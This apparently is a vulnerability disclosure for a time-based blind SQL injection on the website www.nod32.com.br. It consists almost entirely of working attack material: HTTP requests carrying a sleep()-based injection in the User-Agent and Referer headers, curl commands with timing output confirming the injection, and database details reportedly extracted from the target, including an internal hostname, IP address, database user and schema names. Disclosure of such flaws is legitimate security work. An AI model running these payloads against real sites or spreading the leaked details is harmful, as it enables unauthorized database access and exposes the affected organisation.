-------------------------
Vulnerable URL: http://www.nod32.com.br
Vulnerable HTTP eaders: Referer and User-Agent
### Request (User-Agent)
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0’+(SELECT*FROM(SELECT(sleep(20)))a)+++’
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97
### Request (Referer)
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac’+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++’
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97
### Proof of Concept
For the proof of concept, the next data was retrieved from the affected database:
HostName: 798348-db2.eset.com
DBMS: MySQL 5.6.31
DB User: esetla_otros@192.168.103.108
Current DB: esetla_otros
DBA Privileges: False
DB's: esetla_pol, esetsa_uyrps, infproayoon_schema
### Multiple Time Based SQL Injection
$ time curl -e
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'"
"http://www.nod32.com.br/kb/SOLN2522"
real 0m20,403s
user 0m0,008s
sys 0m0,004s
$ time curl -e
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(10)))a)+++'"
"http://www.nod32.com.br/kb/SOLN2522"
real 0m10,320s
user 0m0,004s
sys 0m0,008s
$ time curl -e
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(5)))a)+++'"
"http://www.nod32.com.br/kb/SOLN2522"
real 0m5,318s
user 0m0,008s
sys 0m0,004s